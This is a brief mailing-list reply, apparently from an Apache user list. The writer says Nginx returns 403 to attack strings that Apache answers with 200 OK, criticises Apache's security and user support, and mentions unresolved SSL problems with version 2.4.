I see these type of attack strings all the time on Nginx except Nginx gives
a 403. Apache is notoriously bad with security and giving 200 ok responses
makes you **** yourself. A reason  I and many other people have switched.
User support on this list was also non existent when I ran into serious SSL
problems with 2.4 that until today have been ignored and unanswered.